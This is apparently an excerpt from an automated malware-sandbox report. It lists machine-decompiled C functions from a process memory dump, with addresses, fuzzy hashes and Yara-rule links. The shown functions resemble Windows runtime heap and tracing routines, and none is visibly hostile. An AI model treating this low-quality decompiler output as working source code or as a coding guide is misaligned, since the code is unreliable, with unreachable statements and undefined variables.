                                                        0x048920d4
                                                        0x04892085
                                                        0x04892085
                                                        0x048920a3
                                                        0x048920a3

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 180c1d401e1141ad3be5b3c136f3893f83c88d5457f6f3ff65149d9e6ccae1ca
                                                        • Instruction ID: 270fcb1316039fda5eb82b18bcef5b4f500b418aff22a43ec4b73272a204200a
                                                        • Opcode Fuzzy Hash: 180c1d401e1141ad3be5b3c136f3893f83c88d5457f6f3ff65149d9e6ccae1ca
                                                        • Instruction Fuzzy Hash: CFF02766455A94BAEF327F29A0002D22BC0C745218B0D0FC5D550D7200C578BC83CA21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A8D34, Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 43%
                                                        			E048A8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x48cd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E047F7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0481B640(E04819AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                        0x048a8d34
                                                        0x048a8d43
                                                        0x048a8d4b
                                                        0x048a8d4e
                                                        0x048a8d52
                                                        0x048a8d5c
                                                        0x048a8d6e
                                                        0x048a8d5e
                                                        0x048a8d67
                                                        0x048a8d67
                                                        0x048a8d79
                                                        0x048a8d7a
                                                        0x048a8d7c
                                                        0x048a8d81
                                                        0x048a8d94

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbadcacd92ce0daa633d5f96d8469218003cc7940c77f0b46a03c64c965bed2b
                                                        • Instruction ID: a872370c78999ee3d89ea597101b1b01c177eb088e05ac5089f1e23627a36995
                                                        • Opcode Fuzzy Hash: fbadcacd92ce0daa633d5f96d8469218003cc7940c77f0b46a03c64c965bed2b
                                                        • Instruction Fuzzy Hash: 85F09070A046089FE704EBB8D445A6EB7B8EB18304F5085AAE905EB390EA78E900C754
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0481927A, Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E0481927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0481FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E048192C6(_t11, _t14);
				}
				return _t11;
			}





                                                        0x04819295
                                                        0x04819299
                                                        0x0481929f
                                                        0x048192aa
                                                        0x048192ad
                                                        0x048192ae
                                                        0x048192af
                                                        0x048192b0
                                                        0x048192b4
                                                        0x048192bb
                                                        0x048192bb
                                                        0x048192c5

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                        • Instruction ID: b55c021d910d9982b082991e45a0bcd6b855528f5724531bc7dab729080a04b6
                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                        • Instruction Fuzzy Hash: CFE02B723405002BE7219E09DC84F03376DDF82724F00447AF6045F252C6E5ED08C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047F746D, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E047F746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E047EEB70(__ecx, 0x48c79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E048195D0();
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                        0x047f746d
                                                        0x047f746d
                                                        0x047f746d
                                                        0x047f7471
                                                        0x047f7488
                                                        0x0483f92d
                                                        0x047f748e
                                                        0x047f7491
                                                        0x047f7495
                                                        0x0483f937
                                                        0x0483f93a
                                                        0x0483f94e
                                                        0x0483f953
                                                        0x0483f956
                                                        0x0483f956
                                                        0x047f7495
                                                        0x00000000
                                                        0x047f7488
                                                        0x047f7473
                                                        0x047f7478
                                                        0x047f747d
                                                        0x047f7481
                                                        0x00000000
                                                        0x047f7481
                                                        0x047f747d
                                                        0x047f747a
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4977c622ddfe6c2dad8ada8696cae271f89e5cb053518c103108269b94c2f38
                                                        • Instruction ID: c1597042aad648b0273a9ef2de86311d8fefed2ab58daffd0da3a420c7573693
                                                        • Opcode Fuzzy Hash: d4977c622ddfe6c2dad8ada8696cae271f89e5cb053518c103108269b94c2f38
                                                        • Instruction Fuzzy Hash: C6F0B434A20144AADF0A9B68CC40F79BBA1AF04358F040B59DB51AF360F764B802CBD5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A8CD6, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 36%
                                                        			E048A8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x48cd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E047F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0481B640(E04819AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                        0x048a8ce5
                                                        0x048a8ced
                                                        0x048a8cf0
                                                        0x048a8cfb
                                                        0x048a8d0d
                                                        0x048a8cfd
                                                        0x048a8d06
                                                        0x048a8d06
                                                        0x048a8d18
                                                        0x048a8d19
                                                        0x048a8d1b
                                                        0x048a8d20
                                                        0x048a8d33

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 383bd612960fa2935a5c954b73114b68fb2d0457b9f7bc98973e8a950144f276
                                                        • Instruction ID: 7c13f4ef38da3a15ae4f96196371790ce726d80f0acca0bea8d4d0e256f8aa6b
                                                        • Opcode Fuzzy Hash: 383bd612960fa2935a5c954b73114b68fb2d0457b9f7bc98973e8a950144f276
                                                        • Instruction Fuzzy Hash: 61F08970A041089BDB04EBBCD945D6E77B8EF18304F50065AE515EB390EA78E900C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047D4F2E, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047D4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E048A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E047FC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x47b1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                        0x047d4f2e
                                                        0x047d4f34
                                                        0x047d4f38
                                                        0x04830b85
                                                        0x04830b85
                                                        0x04830b89
                                                        0x04830b9a
                                                        0x04830b9a
                                                        0x04830b9f
                                                        0x00000000
                                                        0x04830b9f
                                                        0x04830b94
                                                        0x04830b98
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04830b98
                                                        0x047d4f3e
                                                        0x047d4f48
                                                        0x00000000
                                                        0x047d4f6e
                                                        0x00000000
                                                        0x047d4f70

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e68205a3330b87f3422661900ae7811f5a3b63c717f0ee004b6299db7be1fd02
                                                        • Instruction ID: aeb1572165d5a1af68ee537b48ac09ffc0d8751b02c76de6b19aa0671c879163
                                                        • Opcode Fuzzy Hash: e68205a3330b87f3422661900ae7811f5a3b63c717f0ee004b6299db7be1fd02
                                                        • Instruction Fuzzy Hash: DFF0BE329256948FE761DB58C244B22B7E4AB067B9F444AA4D405C7A28C764FC40C6C0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A8B58, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 36%
                                                        			E048A8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x48cd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E047F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0481B640(E04819AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                        0x048a8b67
                                                        0x048a8b6f
                                                        0x048a8b72
                                                        0x048a8b7d
                                                        0x048a8b8f
                                                        0x048a8b7f
                                                        0x048a8b88
                                                        0x048a8b88
                                                        0x048a8b9a
                                                        0x048a8b9b
                                                        0x048a8b9d
                                                        0x048a8ba2
                                                        0x048a8bb5

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f064ee9254a82b55d158b829fc4fbc428f3f0235b5387bcfff0e7f88cfcda898
                                                        • Instruction ID: 2cd04190b9e65a8b44848510048688fe44cac67a864f89e9243573e76bcfc05a
                                                        • Opcode Fuzzy Hash: f064ee9254a82b55d158b829fc4fbc428f3f0235b5387bcfff0e7f88cfcda898
                                                        • Instruction Fuzzy Hash: D6F089B0A042589BEB04EBB8D905E6E73B8FF04304F440959B905DB390FB74E905C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480A44B, Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0480A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x48c7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0481FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                        0x0480a44b
                                                        0x0480a453
                                                        0x0480a472
                                                        0x0480a476
                                                        0x00000000
                                                        0x0480a493
                                                        0x0480a47a
                                                        0x0480a47f
                                                        0x0480a486
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ac1a0b3ca9c63f52c48c8007724cd939092e27457883357f6ef76edfd094b03
                                                        • Instruction ID: d26305b3678e0ae519fe4b59afea8b50ad4067b3460efa53cf4143148a5c3f48
                                                        • Opcode Fuzzy Hash: 0ac1a0b3ca9c63f52c48c8007724cd939092e27457883357f6ef76edfd094b03
                                                        • Instruction Fuzzy Hash: 4CE09272A52821ABD3115E18FC00F6773ADDBE4655F094935E604E7250D668ED01C7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DF358, Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E047DF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0480F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L047F4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                        0x047df35d
                                                        0x047df361
                                                        0x047df367
                                                        0x047df372
                                                        0x047df38c
                                                        0x047df38c
                                                        0x047df394

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                        • Instruction ID: ed8d3dda742bbd804b857470ecccd28b41c0ccb7a39a62b79e5e97f38e7b4fba
                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                        • Instruction Fuzzy Hash: 68E0DF32A50118BBDB31ABDD9E05FABBBBCDB48B60F064195FA04D7290D5A0AE40D7D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047EFF60, Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047EFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x47b11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E048A88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E047F0050(_t14);
				}
			}










                                                        0x047eff66
                                                        0x047eff6b
                                                        0x00000000
                                                        0x047eff8f
                                                        0x00000000
                                                        0x047eff8f

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 916d360f3261806933ca6d46d104331ebf7d30555815b694627d22b64565cfb9
                                                        • Instruction ID: a68496da7df37079a83e3b76c1c8c039697b8f1d8c7a990314981fc882af275b
                                                        • Opcode Fuzzy Hash: 916d360f3261806933ca6d46d104331ebf7d30555815b694627d22b64565cfb9
                                                        • Instruction Fuzzy Hash: 4DE0DFB0205244AFEB34DB9BD150F353798DF4E725F19861DE4084BB02D621F880C25A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048641E8, Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E048641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x48b08f0);
				_t5 = E0482D08C(__ebx, __edi, __esi);
				if( *0x48c87ec == 0) {
					E047EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x48c87ec == 0) {
						 *0x48c87f0 = 0x48c87ec;
						 *0x48c87ec = 0x48c87ec;
						 *0x48c87e8 = 0x48c87e4;
						 *0x48c87e4 = 0x48c87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04864248();
				}
				return E0482D0D1(_t5);
			}





                                                        0x048641e8
                                                        0x048641ea
                                                        0x048641ef
                                                        0x048641fb
                                                        0x04864206
                                                        0x0486420b
                                                        0x04864216
                                                        0x0486421d
                                                        0x04864222
                                                        0x0486422c
                                                        0x04864231
                                                        0x04864231
                                                        0x04864236
                                                        0x0486423d
                                                        0x0486423d
                                                        0x04864247

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61461f29110217b53261af8da30956c9197058a62063d0a2dbb9a48d56894ae4
                                                        • Instruction ID: 5663b712a1c30e1881c88c891bd330e39e65f16f681e11d029369064783e3d48
                                                        • Opcode Fuzzy Hash: 61461f29110217b53261af8da30956c9197058a62063d0a2dbb9a48d56894ae4
                                                        • Instruction Fuzzy Hash: DDF015748D1700CFEBA0FFAAE50471836E4F74471AF114E1A8101C7398E778A984CF06
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0488D380, Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0488D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L047DE8B0(__ecx, _a4, 0xfff);
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                        0x0488d38a
                                                        0x0488d39b
                                                        0x0488d3b1
                                                        0x00000000
                                                        0x0488d3b6
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                        • Instruction ID: bacb60b0831a700a31b21903986d953bda6e69b8576bac137e8a3cbfb2f64d36
                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                        • Instruction Fuzzy Hash: F6E0C231280648BBEB226E48CC00FA97B6ADB407A4F104435FE089A7D0D675BC91E7D4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480A185, Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0480A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x48c67e4 >= 0xa) {
					if(_t5 < 0x48c6800 || _t5 >= 0x48c6900) {
						return L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E047F0010(0x48c67e0, _t5);
				}
			}





                                                        0x0480a190
                                                        0x0480a1a6
                                                        0x0480a1c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0480a192
                                                        0x0480a192
                                                        0x0480a19f
                                                        0x0480a19f

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03d14c3c980a119d04fc50246590be80cb7f6f18c44826c4f57e60421112ce6a
                                                        • Instruction ID: fce6082bd7430d33ae67652d9c7a34965392add243c6845fb6a4ce4045c5e262
                                                        • Opcode Fuzzy Hash: 03d14c3c980a119d04fc50246590be80cb7f6f18c44826c4f57e60421112ce6a
                                                        • Instruction Fuzzy Hash: 74D012625711405AF71D5710AD58B252216E798718F208F2DE307EA7D0FA74F8D89158
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048016E0, Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048016E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04801710(0x48c67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L047F4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                        0x048016e8
                                                        0x048016ef
                                                        0x048016f3
                                                        0x048016fe
                                                        0x00000000
                                                        0x04801700
                                                        0x0480170d
                                                        0x0480170d
                                                        0x048016f2
                                                        0x048016f2
                                                        0x048016f2
                                                        0x048016f2

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a3ee8318f72c33591109bc968327c128c6f2e3e2669bc2eb2472fb34cd25b02
                                                        • Instruction ID: 88ac1112017e9231d7c8dbc8168fad488d6c30e6afbb96010e48c88a275d4c13
                                                        • Opcode Fuzzy Hash: 8a3ee8318f72c33591109bc968327c128c6f2e3e2669bc2eb2472fb34cd25b02
                                                        • Instruction Fuzzy Hash: 97D0A73116010096FE3D5B149C0CB152251EB807A9F380A6CF217D95C0CFB2FD92E448
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048553CA, Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048553CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E047EEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                        0x048553ca
                                                        0x048553ce
                                                        0x048553d9
                                                        0x048553de
                                                        0x048553e1
                                                        0x048553e1
                                                        0x048553e6
                                                        0x048553f3
                                                        0x00000000
                                                        0x048553f8
                                                        0x048553fb

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                        • Instruction ID: 889ad2b26b17976590a6557ae4ed4d32f34042a58b08628f3ca37a4c5413c1bd
                                                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                        • Instruction Fuzzy Hash: 71E08C31900680ABCF12DB4DCA54F9EB7F9FB45B00F140914A4089B730C624BD00CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048035A1, Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048035A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E047EEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                        0x048035a1
                                                        0x048035a1
                                                        0x048035a5
                                                        0x048035ab
                                                        0x048035ab
                                                        0x048035b5
                                                        0x00000000
                                                        0x048035c1
                                                        0x048035b7

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
